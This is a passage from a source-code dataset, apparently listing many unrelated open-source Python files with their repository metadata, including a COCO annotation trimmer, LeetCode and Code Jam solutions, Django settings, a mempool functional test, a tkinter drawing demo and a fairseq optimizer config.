    for img in coco_dictB['images']:
        if img['file_name'] in imgs_A:
            new_img_id = len(new_imgs) + 1
            img_id_map[img['id']] = new_img_id
            img['id'] = new_img_id
            new_imgs.append(img)
            present_imgs.append(img['file_name'])
    coco_dictB['images'] = new_imgs
    remainder = imgs_A - set(present_imgs)
    if len(remainder) > 0:
        warn(f'The following images are present in reference coco json (cocojsonA) but not in coco json to be trimmed (cocojsonB): {remainder}')
    new_annots = []
    for annot in coco_dictB['annotations']:
        if annot['image_id'] in img_id_map:
            # Remap to the image's new id and renumber the annotation itself.
            annot['image_id'] = img_id_map[annot['image_id']]
            new_annot_id = len(new_annots) + 1
            annot['id'] = new_annot_id
            new_annots.append(annot)
    coco_dictB['annotations'] = new_annots
    return coco_dictB
"lingevan0208@gmail.com"
] | lingevan0208@gmail.com |
babf3556cc545666b1fd5bc0fa2e7c7c866d4d36 | 1dcea2a511f14a43701994f6a7785afd21a20d74 | /Algorithm/238_ProductOfArrayExceptSelf.py | 030464a484918661c1a3907dd92ed2f9a103745f | [] | no_license | lingtianwan/Leetcode2 | 66031e256a2928c6197516f83f14748c52e91b8c | 80a604cc09d5d2d62dd05157d8b829de675e4404 | refs/heads/master | 2021-01-13T11:17:18.238465 | 2017-02-09T01:43:38 | 2017-02-09T01:43:38 | 81,395,927 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 813 | py | # Given an array of n integers where n > 1, nums, return an array output such that output[i] is equal to the product of all the elements of nums except nums[i].
#
# Solve it without division and in O(n).
#
# For example, given [1,2,3,4], return [24,12,8,6].
#
# Follow up:
# Could you solve it with constant space complexity? (Note: The output array does not count as extra space for the purpose of space complexity analysis.)
class Solution(object):
    def productExceptSelf(self, nums):
        """Return a list where entry i is the product of all nums except nums[i].

        Two passes, no division: a prefix-product sweep followed by a
        suffix-product sweep folded into the same output list.

        :type nums: List[int]
        :rtype: List[int]
        """
        n = len(nums)
        output = [1] * n
        # Forward pass: output[i] = product of nums[0..i-1].
        for i in range(1, n):
            output[i] = output[i - 1] * nums[i - 1]
        # Backward pass: multiply in the product of nums[i+1..n-1].
        suffix = 1
        for i in range(n - 1, -1, -1):
            output[i] *= suffix
            suffix *= nums[i]
        return output
| [
"lingtian.wan@gmail.com"
] | lingtian.wan@gmail.com |
15a360f877237724019cefa1b220d0b7e37d578b | 1255ba402b4eca4bb58ccfbb994311cac97cbf72 | /official_learning/gpu_learning/using_multiple_gpu02.py | d096c6c1190d9a741523bc7cc6100e4daa2635b7 | [] | no_license | suiup/tensorflow_learning | c5eaf85abc24feeab9b8e7ba6bc1f0e0ae525add | beb9940d951a0b9a902db9f2dcc7f2e63d278e49 | refs/heads/master | 2023-06-07T19:37:13.785541 | 2021-06-27T21:01:36 | 2021-06-27T21:01:36 | 374,089,087 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 661 | py | import tensorflow as tf
# After creating multiple logical GPUs available at runtime, we can use them
# via tf.distribute.Strategy or by manual device placement.
# Using tf.distribute.Strategy:
# the best practice for multiple GPUs is tf.distribute.Strategy. Simple example:
tf.debugging.set_log_device_placement(True)  # log which device each op runs on
strategy = tf.distribute.MirroredStrategy()
with strategy.scope():
  inputs = tf.keras.layers.Input(shape=(1,))
  predictions = tf.keras.layers.Dense(1)(inputs)
  model = tf.keras.models.Model(inputs=inputs, outputs=predictions)
  model.compile(loss='mse',
                optimizer=tf.keras.optimizers.SGD(learning_rate=0.2))
"931857499@qq.com"
] | 931857499@qq.com |
a12a7754231293c6511a2c5d48beba01a1108a01 | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_3/brusco/c.py | 16ff5c081f90011dc8ddb3c223656bee4d882cf7 | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 1,263 | py | import math
def trial_division(n):
    """Return the smallest divisor of n in [2, min(sqrt(n), 1000)], or None.

    The search is deliberately capped at 1000: callers only need a divisor
    that is found quickly, not a full primality proof.

    Fix: the loop bound is now inclusive (<=). The original used '<', which
    missed divisors of perfect squares (e.g. 4, 9, 25 were reported as having
    no divisor).
    """
    candidate = 2
    # no need to find a divisor by all means, just skip it if not found soon
    max_candidate = min(math.sqrt(n), 1000)
    while candidate <= max_candidate:
        if n % candidate == 0:
            return candidate
        # next candidate: 2 -> 3, then skip even numbers
        candidate = 3 if candidate == 2 else candidate + 2
    return None
binary = lambda number: bin(number)[2:]
# Python 2 script (raw_input / print statement / xrange).
# Google Code Jam "jamcoins": strings of 0/1 digits, starting and ending in 1,
# that are composite when interpreted in every base from 2 to 10.
if __name__ == "__main__":
    raw_input()  # skip the test-case count line
    length, jamcoins_count = tuple(int(value) for value in raw_input().split())
    print "Case #1:"
    found_jamcoins = 0
    # Enumerate the free middle bits; the outer '1's are fixed below.
    for i in xrange(0, pow(2, length - 2)):
        coin = binary(i)
        # Zero-pad the middle and pin a '1' at both ends.
        coin = "1" + ("0" * (length - 2 - len(coin))) + coin + "1"
        divisors = []
        for base in xrange(2, 11):
            interpretation = int(coin, base)
            divisor = trial_division(interpretation)
            if divisor is None:
                # No quick divisor in some base: not provably a jamcoin.
                break
            else:
                divisors.append(divisor)
        # A divisor was found in all 9 bases: emit coin plus its witnesses.
        if len(divisors) == 9:
            print coin, " ".join([str(divisor) for divisor in divisors])
            found_jamcoins += 1
        if found_jamcoins == jamcoins_count:
            break
| [
"[dhuo@tcd.ie]"
] | [dhuo@tcd.ie] |
98a16b0699f3317e3568f473dc03c0b82b4daf6d | 8e07f5f06452f9566640d2130a5c1bcefcebd745 | /Django-CRM-master (1)/crm/asgi.py | eaba65d8a0999dd79986c88bea8639f3a360ab81 | [
"MIT"
] | permissive | bot242/djangocrm | 65dbe42a814fd538d77ec9c0cc5626a7d6ce19b4 | 6f5e64b4f65dbb13583d68ef5f6a3feaea51befb | refs/heads/main | 2023-01-23T10:29:32.338620 | 2020-12-02T06:43:35 | 2020-12-02T06:43:35 | 317,773,468 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 196 | py | import os
import django
from channels.routing import get_default_application
# Point Django at the project settings before any app code is imported.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "crm.settings")
django.setup()
# ASGI entry point exposed for the channels application server.
application = get_default_application()
"sankarmass619@gmail.com"
] | sankarmass619@gmail.com |
92ffb2c60396fcf2b0da46542c5b53ee324bc361 | 07e8eaeaa6f3493546ba6b499be1593252f3c773 | /examples/optimizers/evolutionary/create_rra.py | 7b31f25940e6988859224e2d5a283e090c9b0ad0 | [
"Apache-2.0"
] | permissive | himanshuRepo/opytimizer | 91dd848fffbe85736d8074169d515e46a8b54d74 | 09e5485b9e30eca622ad404e85c22de0c42c8abd | refs/heads/master | 2023-07-20T18:16:00.565759 | 2021-09-02T19:40:43 | 2021-09-02T19:40:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 291 | py | from opytimizer.optimizers.evolutionary import RRA
# One should declare a hyperparameters object based
# on the desired algorithm that will be used
# NOTE(review): key semantics are defined by opytimizer's RRA (Runner-Root
# Algorithm) implementation — confirm the meaning of d_runner/d_root/tol/
# max_stall against the library's documentation.
params = {
    'd_runner': 2,
    'd_root': 0.01,
    'tol': 0.01,
    'max_stall': 1000
}
# Creates an RRA optimizer
o = RRA(params=params)
| [
"gth.rosa@uol.com.br"
] | gth.rosa@uol.com.br |
0212b8dcf17fd5ff0a6125d8cc81a9f573a9bf9c | 8946774baf03ddc089f3bdd54c8fdfce2c48b93f | /proadv/api/management/commands/load_search_terms.py | 40fb5053fd2a4da532ead8adc5580fff3718d031 | [] | no_license | olavosamp/proadv_api | fdf9a44955f2e142d06ecf780c0ce76dada376b7 | 483e55164cf354638dc2531a44678942098c8721 | refs/heads/main | 2023-04-13T01:44:34.881869 | 2021-04-20T00:56:11 | 2021-04-20T00:56:11 | 357,301,408 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,287 | py | import json
from api.models import SearchTerm
from api.utils import get_search_term, check_valid_keys
from api.defines import SEARCH_TERM_KEY_DICT
from django.core.management import BaseCommand
class Command(BaseCommand):
    """Management command: bulk-import SearchTerm rows from a JSON file."""

    help = "Imports search term data from a JSON file with format: [{classificacao: str, termo: str}, ...]"

    def add_arguments(self, parser):
        parser.add_argument('file_path', nargs='+', type=str)

    def handle(self, *args, **options):
        """Load the JSON file, validate each record, and bulk-create entries."""
        json_path = options['file_path'][0]
        expected_keys = SEARCH_TERM_KEY_DICT.values()
        print(f"\nLoading search terms from \n{json_path}")
        with open(json_path) as fp:
            records = json.load(fp)
        pending = []
        for record in records:
            # Skip (with a message) any record missing the expected keys.
            if not check_valid_keys(record.keys(), expected_keys):
                print(f"\nInvalid data format: missing any of {list(expected_keys)}\nFile not loaded.")
                continue
            pending.append(SearchTerm(**get_search_term(record)))
        print(f"\nFound {len(pending)} search term objects.")
        SearchTerm.objects.bulk_create(pending)
        print("Import finished.")
| [
"olavosamp@poli.ufrj.br"
] | olavosamp@poli.ufrj.br |
997d1934983b8deab7bab2fa546b9ca180129268 | a3d39c53b1abf4d35c9a9a1d8c8f226572f29bcd | /test/functional/mempool_unbroadcast.py | 4554a5c9859854c3a7cd0de7667a3b11d04b2ecc | [
"MIT"
] | permissive | BakedInside/Beans-Core | afc3a55efa3e14e62a19f4bc4d5ae5a357f5f1de | daa9b2ddbfd3305881749bda7f32146738154260 | refs/heads/master | 2022-07-30T05:42:26.680123 | 2021-05-22T15:35:40 | 2021-05-22T15:35:40 | 369,584,373 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,218 | py | #!/usr/bin/env python3
# Copyright (c) 2017-2020 The Beans Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test that the mempool ensures transaction delivery by periodically sending
to peers until a GETDATA is received."""
import time
from test_framework.p2p import P2PTxInvStore
from test_framework.test_framework import BeansTestFramework
from test_framework.util import (
assert_equal,
create_confirmed_utxos,
)
MAX_INITIAL_BROADCAST_DELAY = 15 * 60 # 15 minutes in seconds
class MempoolUnbroadcastTest(BeansTestFramework):
    # Functional test: locally submitted txs stay in the "unbroadcast" set and
    # are periodically re-announced until a peer requests them with GETDATA.
    def set_test_params(self):
        # Node 0 creates transactions; node 1 is the peer that should receive them.
        self.num_nodes = 2
    def skip_test_if_missing_module(self):
        # Both sub-tests create wallet transactions.
        self.skip_if_no_wallet()
    def run_test(self):
        self.test_broadcast()
        self.test_txn_removal()
    def test_broadcast(self):
        """Unbroadcast txs persist across a restart and reach node 1 after reconnect."""
        self.log.info("Test that mempool reattempts delivery of locally submitted transaction")
        node = self.nodes[0]
        min_relay_fee = node.getnetworkinfo()["relayfee"]
        utxos = create_confirmed_utxos(min_relay_fee, node, 10)
        # Disconnect the peer so the initial announcement cannot be delivered.
        self.disconnect_nodes(0, 1)
        self.log.info("Generate transactions that only node 0 knows about")
        # generate a wallet txn
        addr = node.getnewaddress()
        wallet_tx_hsh = node.sendtoaddress(addr, 0.0001)
        # generate a txn using sendrawtransaction
        us0 = utxos.pop()
        inputs = [{"txid": us0["txid"], "vout": us0["vout"]}]
        outputs = {addr: 0.0001}
        tx = node.createrawtransaction(inputs, outputs)
        node.settxfee(min_relay_fee)
        txF = node.fundrawtransaction(tx)
        txFS = node.signrawtransactionwithwallet(txF["hex"])
        rpc_tx_hsh = node.sendrawtransaction(txFS["hex"])
        # check transactions are in unbroadcast using rpc
        mempoolinfo = self.nodes[0].getmempoolinfo()
        assert_equal(mempoolinfo['unbroadcastcount'], 2)
        mempool = self.nodes[0].getrawmempool(True)
        for tx in mempool:
            assert_equal(mempool[tx]['unbroadcast'], True)
        # check that second node doesn't have these two txns
        mempool = self.nodes[1].getrawmempool()
        assert rpc_tx_hsh not in mempool
        assert wallet_tx_hsh not in mempool
        # ensure that unbroadcast txs are persisted to mempool.dat
        self.restart_node(0)
        self.log.info("Reconnect nodes & check if they are sent to node 1")
        self.connect_nodes(0, 1)
        # fast forward into the future & ensure that the second node has the txns
        node.mockscheduler(MAX_INITIAL_BROADCAST_DELAY)
        self.sync_mempools(timeout=30)
        mempool = self.nodes[1].getrawmempool()
        assert rpc_tx_hsh in mempool
        assert wallet_tx_hsh in mempool
        # check that transactions are no longer in first node's unbroadcast set
        mempool = self.nodes[0].getrawmempool(True)
        for tx in mempool:
            assert_equal(mempool[tx]['unbroadcast'], False)
        self.log.info("Add another connection & ensure transactions aren't broadcast again")
        conn = node.add_p2p_connection(P2PTxInvStore())
        node.mockscheduler(MAX_INITIAL_BROADCAST_DELAY)
        time.sleep(2)  # allow sufficient time for possibility of broadcast
        assert_equal(len(conn.get_invs()), 0)
        self.disconnect_nodes(0, 1)
        node.disconnect_p2ps()
    def test_txn_removal(self):
        """A tx leaves the unbroadcast set once it is confirmed in a block."""
        self.log.info("Test that transactions removed from mempool are removed from unbroadcast set")
        node = self.nodes[0]
        # since the node doesn't have any connections, it will not receive
        # any GETDATAs & thus the transaction will remain in the unbroadcast set.
        addr = node.getnewaddress()
        txhsh = node.sendtoaddress(addr, 0.0001)
        # check transaction was removed from unbroadcast set due to presence in
        # a block
        removal_reason = "Removed {} from set of unbroadcast txns before confirmation that txn was sent out".format(txhsh)
        with node.assert_debug_log([removal_reason]):
            node.generate(1)
if __name__ == "__main__":
    MempoolUnbroadcastTest().main()
| [
"lanorlasystem@gmail.com"
] | lanorlasystem@gmail.com |
be49460b81c32e70942ea2581bb64a8da075a02b | b91588cda1a129f06aa9493ee6d6a70e4f996b7f | /Production/python/Spring16/SMS-T1tttt_mGluino-1500_mLSP-100_TuneCUETP8M1_13TeV-madgraphMLM-pythia8_cff.py | 3ee5ed60931bbb4ad7c6542352ccff2cb49ba1ca | [] | no_license | muzamilahmad/LeptoQuarkTreeMaker | 2371e93589dbe41b02a93a2533cbf5e955aaa0db | 8e7eed0d03c6770a029eafb9b638e82c600a7425 | refs/heads/master | 2021-01-19T01:02:35.749590 | 2018-02-06T17:27:52 | 2018-02-06T17:27:52 | 65,389,201 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 945 | py | import FWCore.ParameterSet.Config as cms
# CMSSW configuration fragment for this MC dataset.
maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )  # -1 = process all events
readFiles = cms.untracked.vstring()
secFiles = cms.untracked.vstring()
# PoolSource reads the primary files; no secondary files are supplied here.
source = cms.Source ("PoolSource",fileNames = readFiles, secondaryFileNames = secFiles)
# Logical file names ('/store/...') resolved by the CMS file catalog at runtime.
readFiles.extend( [
       '/store/mc/RunIISpring16MiniAODv1/SMS-T1tttt_mGluino-1500_mLSP-100_TuneCUETP8M1_13TeV-madgraphMLM-pythia8/MINIAODSIM/PUSpring16_80X_mcRun2_asymptotic_2016_v3-v1/60000/26C76166-0FFE-E511-BA96-0025905D1D60.root',
       '/store/mc/RunIISpring16MiniAODv1/SMS-T1tttt_mGluino-1500_mLSP-100_TuneCUETP8M1_13TeV-madgraphMLM-pythia8/MINIAODSIM/PUSpring16_80X_mcRun2_asymptotic_2016_v3-v1/60000/54D0DC62-1AFE-E511-AF9E-0025905C2CE6.root',
       '/store/mc/RunIISpring16MiniAODv1/SMS-T1tttt_mGluino-1500_mLSP-100_TuneCUETP8M1_13TeV-madgraphMLM-pythia8/MINIAODSIM/PUSpring16_80X_mcRun2_asymptotic_2016_v3-v1/60000/C6A56846-FFFD-E511-9207-0025905C2CB8.root',
] )
| [
"kpedro88@gmail.com"
] | kpedro88@gmail.com |
16d8f084b4433e0bb41935d168c212cfd4226d78 | 6a07912090214567f77e9cd941fb92f1f3137ae6 | /cs101/Unit 3/29.py | 5c575716467bd6aff72509a752ed2600fa22f762 | [] | no_license | rrampage/udacity-code | 4ab042b591fa3e9adab0183d669a8df80265ed81 | bbe968cd27da7cc453eada5b2aa29176b0121c13 | refs/heads/master | 2020-04-18T08:46:00.580903 | 2012-08-25T08:44:24 | 2012-08-25T08:44:24 | 5,352,942 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 422 | py | # cs101 ; Unit 3 ; 29
# Define a procedure, union,
# that takes as inputs two lists.
# It should modify the first input
# list to be the set union of the two
# lists. You may assume the first list
# is a set, that is, it contains no
# repeated elements.
# To test, uncomment all lines
# below except those beginning with >>>.
#a = [1,2,3]
#b = [2,4,6]
#union(a,b)
#print a
#>>> [1,2,3,4,6]
#print b
#>>> [2,4,6]
| [
"raunak1001@gmail.com"
] | raunak1001@gmail.com |
1acd7fc6a279c84694f983315670c8f94cbe2106 | bf52ad6cac5e69a62b141cdf050bffa56f6ab1c9 | /division/app.py | df3d9fca4db57871e10e6271f41753bb35cb99f4 | [] | no_license | diegoguizag1992/ArquitecturaMicroservicios | e931608da6183925e08fa9c066eecdefac3d20f9 | 934b20ec48388dc47634c1b67e06b059eceadd06 | refs/heads/master | 2023-01-14T04:10:23.333673 | 2020-11-23T02:33:17 | 2020-11-23T02:33:17 | 315,170,278 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 226 | py | from flask import Flask
app = Flask(__name__)

@app.route("/division/<int:valor1>/<int:valor2>")
def division(valor1, valor2):
    """Return valor1 / valor2 as text.

    Fix: a zero divisor previously raised an unhandled ZeroDivisionError
    (HTTP 500); it now returns a 400 with an explanatory message.
    """
    if valor2 == 0:
        return "division by zero", 400
    return str(valor1 / valor2)

if __name__ == "__main__":
    app.run(host='0.0.0.0', debug=True)
"apdaza@gmail.com"
] | apdaza@gmail.com |
f25696cb1a246d1155d0461d4f872a23a144f52f | e48f110e638df31129963ff2a6b4dbba44354d33 | /script/parse_xml_tr.py | d6ec02911c3031ccd4fbcc04286e79962dd8bb1b | [] | no_license | didw/kra | dfa6e0f4d305e56fb11255c8af0554767f981d44 | 2d5ac2bcab5a2b452381c433f4c3c10b8b95e94f | refs/heads/master | 2021-01-11T05:50:49.239175 | 2019-01-06T14:22:36 | 2019-01-06T14:22:36 | 72,058,728 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,254 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from bs4 import BeautifulSoup
import pandas as pd
import glob
def parse_xml_tr(meet):
    """Parse the cached trainer (TR) XML for *meet* into a pandas DataFrame.

    Python 2 code: uses the ``print`` statement and ``unicode``.
    """
    data = []
    filename = '../xml/getTR_%d.xml' % meet
    # NOTE(review): the handle is never closed — consider a with-block.
    file_input = open(filename)
    print "process in %s" % filename
    response_body = file_input.read()
    # presumably html.parser lower-cases tag names, hence .cntt/.ord1t below — confirm
    xml_text = BeautifulSoup(response_body, 'html.parser')
    for itemElm in xml_text.findAll('item'):
        #print itemElm
        try:
            data.append([unicode(itemElm.birth.string),
                unicode(itemElm.cntt.string),
                unicode(itemElm.cnty.string),
                unicode(itemElm.trname.string),
                unicode(itemElm.ord1t.string),
                unicode(itemElm.ord1y.string),
                unicode(itemElm.ord2t.string),
                unicode(itemElm.ord2y.string),
                unicode(itemElm.part.string),
                unicode(itemElm.stdate.string)])
        # NOTE(review): bare except silently drops malformed <item> records.
        except:
            pass
    df = pd.DataFrame(data)
    df.columns = ["birth", "cntT", "cntY", "trName", "ord1T", "ord1Y", "ord2T", "ord2Y", "part", "stDate"]
    return df
# Bug fix: the guard compared __name__ against 'main' instead of '__main__',
# so this demo block could never execute when the script was run directly.
if __name__ == '__main__':
    meet = 1
    data = parse_xml_tr(meet)
    print(data)
| [
"yangjy0113@gmail.com"
] | yangjy0113@gmail.com |
ac29d1a938ea446f3b5cb9bcfabebe28102ba3c6 | e979a08107918af5aae7214cc19927495591cc1d | /demo/Canvas/oval.py | 22e092e4e9b788e7abb795fdf82ef0176c9e7a2e | [] | no_license | jksdou/tkinter-learn | 5b421520bac28736028045c635e78ac364ae134c | 3b19a324e78ce0ce7d5d6f6726e37d2639a60965 | refs/heads/master | 2023-01-22T06:59:03.098433 | 2020-12-07T17:13:06 | 2020-12-07T17:13:06 | 319,378,388 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 416 | py | #!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# 使用 Canvas 画椭圆
from tkinter import Tk, Canvas
window = Tk()
window.title("画椭圆")
window.resizable(False, False)
canvas = Canvas(window, width=500, height=500, bg='white')
# Draw 20 concentric ellipses around (250, 250): the horizontal radius
# shrinks by 5 per step while the vertical radius grows by 5.
for step in range(20):
    rx = 130 - 5 * step
    ry = 130 + 5 * step
    canvas.create_oval(250 - rx, 250 - ry, 250 + rx, 250 + ry)
canvas.pack()
window.mainloop()
| [
"doudoudzj@sina.com"
] | doudoudzj@sina.com |
f79cbf0dbb76b761ebc6b09cd7e6840f0ba8bc43 | b969cb8a74e5de2c82cdf795614f4d115e2ed40c | /benchmarks/dynamo/ci_expected_accuracy/update_expected.py | e61d282be558e3344a03c92b36ecfa96fb82e994 | [
"BSD-2-Clause"
] | permissive | vishalbelsare/pytorch | fabd19fff9b1fb4fd2023605540c82f4c1d8a603 | a39ea6f21361e531ce7e703224bfbce7fc564083 | refs/heads/master | 2023-04-30T05:55:06.631379 | 2023-04-17T04:30:36 | 2023-04-17T04:30:36 | 152,814,397 | 0 | 0 | NOASSERTION | 2023-04-17T10:16:58 | 2018-10-12T22:37:31 | C++ | UTF-8 | Python | false | false | 4,734 | py | """
Update commited CSV files used as reference points by dynamo/inductor CI.
Currently only cares about graph breaks, so only saves those columns.
Hardcodes a list of job names and artifacts per job, but builds the lookup
by querying github sha and finding associated github actions workflow ID and CI jobs,
downloading artifact zips, extracting CSVs and filtering them.
Usage:
python benchmarks/dynamo/ci_expected_accuracy.py <sha of pytorch commit that has completed inductor benchmark jobs>
Known limitations:
- doesn't handle 'retry' jobs in CI, if the same hash has more than one set of artifacts, gets the first one
"""
import argparse
import os
import urllib
from io import BytesIO
from urllib.request import urlopen
from zipfile import ZipFile
import pandas as pd
import requests
# Note: the public query url targets this rockset lambda:
# https://console.rockset.com/lambdas/details/commons.artifacts
ARTIFACTS_QUERY_URL = "https://api.usw2a1.rockset.com/v1/public/shared_lambdas/4ca0033e-0117-41f5-b043-59cde19eff35"
def query_job_sha(repo, sha):
params = {
"parameters": [
{"name": "sha", "type": "string", "value": sha},
{"name": "repo", "type": "string", "value": repo},
]
}
r = requests.post(url=ARTIFACTS_QUERY_URL, json=params)
data = r.json()
return data["results"]
def parse_job_name(job_str):
return (part.strip() for part in job_str.split("/"))
def parse_test_str(test_str):
return (part.strip() for part in test_str[6:].strip(")").split(","))
S3_BASE_URL = "https://gha-artifacts.s3.amazonaws.com"
def get_artifacts_urls(results, suites):
urls = {}
for r in results:
if "inductor" == r["workflowName"] and "test" in r["jobName"]:
config_str, test_str = parse_job_name(r["jobName"])
suite, shard_id, num_shards, machine = parse_test_str(test_str)
workflowId = r["workflowId"]
id = r["id"]
runAttempt = r["runAttempt"]
if suite in suites:
artifact_filename = f"test-reports-test-{suite}-{shard_id}-{num_shards}-{machine}_{id}.zip"
s3_url = f"{S3_BASE_URL}/{repo}/{workflowId}/{runAttempt}/artifact/{artifact_filename}"
urls[(suite, int(shard_id))] = s3_url
print(f"{suite} {shard_id}, {num_shards}: {s3_url}")
return urls
def normalize_suite_filename(suite_name):
subsuite = suite_name.split("_")[1]
if "timm" in subsuite:
subsuite = subsuite.replace("timm", "timm_models")
return subsuite
def download_artifacts_and_extract_csvs(urls):
dataframes = {}
try:
for (suite, shard), url in urls.items():
resp = urlopen(url)
subsuite = normalize_suite_filename(suite)
artifact = ZipFile(BytesIO(resp.read()))
for phase in ("training", "inference"):
name = f"test/test-reports/{phase}_{subsuite}.csv"
try:
df = pd.read_csv(artifact.open(name))
prev_df = dataframes.get((suite, phase), None)
dataframes[(suite, phase)] = (
pd.concat([prev_df, df]) if prev_df is not None else df
)
except KeyError:
print(
f"Warning: Unable to find {name} in artifacts file from {url}, continuing"
)
except urllib.error.HTTPError:
print(f"Unable to download {url}, perhaps the CI job isn't finished?")
return dataframes
def write_filtered_csvs(root_path, dataframes):
for (suite, phase), df in dataframes.items():
out_fn = os.path.join(root_path, f"{suite}_{phase}.csv")
df.to_csv(out_fn, index=False, columns=["name", "accuracy", "graph_breaks"])
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument("sha")
args = parser.parse_args()
repo = "pytorch/pytorch"
suites = {
"inductor_huggingface",
"inductor_huggingface_dynamic",
"inductor_timm",
"inductor_timm_dynamic",
"inductor_torchbench",
"inductor_torchbench_dynamic",
}
root_path = "benchmarks/dynamo/ci_expected_accuracy/"
assert os.path.exists(root_path), f"cd <pytorch root> and ensure {root_path} exists"
results = query_job_sha(repo, args.sha)
urls = get_artifacts_urls(results, suites)
dataframes = download_artifacts_and_extract_csvs(urls)
write_filtered_csvs(root_path, dataframes)
print("Success. Now, confirm the changes to .csvs and `git add` them if satisfied.")
| [
"pytorchmergebot@users.noreply.github.com"
] | pytorchmergebot@users.noreply.github.com |
0e916354a1d3704471d2be020f245a8c7aa813cd | 421d58c6b93b81e0724f8f4576119300eb344252 | /influencers/influencers/urls.py | b86f901777f8d82d4ed3860d80d1054aed5fd2a7 | [] | no_license | momen/influencers | 7728228c92a552bdff9ae62f85986ad03bce186e | f9c76cfc2970440112967f9579dc31f77063cb25 | refs/heads/master | 2020-06-03T22:20:03.881411 | 2019-06-15T07:48:43 | 2019-06-15T07:48:43 | 191,754,739 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 571 | py | from django.urls import path
from rest_framework.routers import DefaultRouter
from influencers.influencers.views import (
InfluencerViewSet,
SocialAccountViewSet,
InfluencerAccountsView,
)
app_name = "influencers"
router = DefaultRouter()
router.register(r"socialaccount", SocialAccountViewSet)
router.register(r"", InfluencerViewSet)
urlpatterns = router.urls
# Append other urls of generic views(Not ViewSet)
urlpatterns += [
path(
"<int:id>/accounts/",
InfluencerAccountsView.as_view(),
name="influencer-accounts",
)
]
| [
"momennegm@gmail.com"
] | momennegm@gmail.com |
8e8438167e9bba3b51f29c3b109269ccb9aedc8e | a98a3cbaf20a844406650ba15705fd6635b097da | /tintg/prod_settings/__init__.py | 320eff557c6462c77d01474723d8a8ce149e6397 | [
"Apache-2.0"
] | permissive | phildini/tintg | 9c34364dda85b4cfe63df9357eb9d58535c7b308 | ad82d94f37b301b5ef8062e472bac52bcfe7ad8f | refs/heads/master | 2021-01-01T05:16:36.439279 | 2016-04-21T18:37:23 | 2016-04-21T18:37:23 | 56,353,571 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 882 | py | import dj_database_url
from tintg.settings import *
DEBUG = False
TEMPLATE_DEBUG = False
DATABASES['default'] = dj_database_url.parse(get_env_variable('TINTG_DB_URL'))
SECRET_KEY = get_env_variable('TINTG_SECRET_KEY')
ALLOWED_HOSTS = [
'localhost',
'127.0.0.1',
'.herokuapp.com',
]
SECURE_HSTS_SECONDS = 3600
SECURE_FRAME_DENY = True
SECURE_CONTENT_TYPE_NOSNIFF = True
SECURE_BROWSER_XSS_FILTER = True
SESSION_COOKIE_SECURE = True
SESSION_COOKIE_HTTPONLY = True
STATIC_URL = '//tintg.s3.amazonaws.com/assets/'
INSTALLED_APPS += (
'gunicorn',
'opbeat.contrib.django',
)
MIDDLEWARE_CLASSES = (
'opbeat.contrib.django.middleware.OpbeatAPMMiddleware',
) + MIDDLEWARE_CLASSES
OPBEAT = {
'ORGANIZATION_ID': get_env_variable("OPBEAT_ORG_ID"),
'APP_ID': get_env_variable("OPBEAT_APP_ID"),
'SECRET_TOKEN': get_env_variable("OPBEAT_SECRET_KEY"),
} | [
"pjj@philipjohnjames.com"
] | pjj@philipjohnjames.com |
fc304828e5e04612a37bc0ee4c746750d8aaaa54 | fb1e852da0a026fb59c8cb24aeb40e62005501f1 | /edgelm/fairseq/optim/cpu_adam.py | 5c738e42918a371e239d89b8e14b9bd1841175ee | [
"LicenseRef-scancode-unknown-license-reference",
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-free-unknown",
"Apache-2.0"
] | permissive | microsoft/unilm | 134aa44867c5ed36222220d3f4fd9616d02db573 | b60c741f746877293bb85eed6806736fc8fa0ffd | refs/heads/master | 2023-08-31T04:09:05.779071 | 2023-08-29T14:07:57 | 2023-08-29T14:07:57 | 198,350,484 | 15,313 | 2,192 | MIT | 2023-08-19T11:33:20 | 2019-07-23T04:15:28 | Python | UTF-8 | Python | false | false | 6,997 | py | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import importlib
from collections.abc import Collection
from dataclasses import dataclass, field
from typing import List
import torch
from fairseq.dataclass import FairseqDataclass
from fairseq.optim import FairseqOptimizer, register_optimizer
from omegaconf import II, DictConfig
try:
import deepspeed
has_deepspeed = True
except ImportError as e:
has_deepspeed = False
def _get_cpu_adam():
try:
from deepspeed.ops.op_builder import CPUAdamBuilder
return CPUAdamBuilder().load()
except ImportError:
# fbcode
from deepspeed.ops.adam import DeepSpeedCPUAdam as ds_opt_adam
return ds_opt_adam
@dataclass
class FairseqCPUAdamConfig(FairseqDataclass):
adam_betas: str = field(
default="(0.9, 0.999)", metadata={"help": "betas for Adam optimizer"}
)
adam_eps: float = field(
default=1e-8, metadata={"help": "epsilon for Adam optimizer"}
)
weight_decay: float = field(default=0.0, metadata={"help": "weight decay"})
fp16_adam_stats: bool = field(
default=False, metadata={"help": "use FP16 stats (with automatic scaling)"}
)
